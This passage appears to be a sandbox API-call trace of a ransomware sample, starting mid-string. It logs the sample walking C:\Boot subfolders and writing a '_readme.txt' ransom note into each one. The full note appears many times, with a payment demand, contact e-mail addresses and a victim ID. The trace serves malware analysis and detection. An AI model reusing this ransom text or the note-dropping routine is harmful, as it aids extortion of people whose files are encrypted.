for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.795] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.797] CloseHandle (hObject=0x690) returned 1 [0173.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.797] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e609d00, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e609d00, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.797] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e609d00, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e609d00, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.797] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.797] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e609d00, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e609d00, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e609d00, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.797] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e609d00, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e609d00, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e609d00, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.797] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.797] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.800] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0173.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.800] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.800] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.800] PathFindFileNameW (pszPath="") returned="" [0173.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.800] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.801] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.801] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.801] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.801] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0173.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.801] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0173.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.802] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.802] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.802] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.803] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.803] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.804] CloseHandle (hObject=0x690) returned 1 [0173.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.805] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e609d00, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e609d00, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.805] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e609d00, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e609d00, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.805] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, 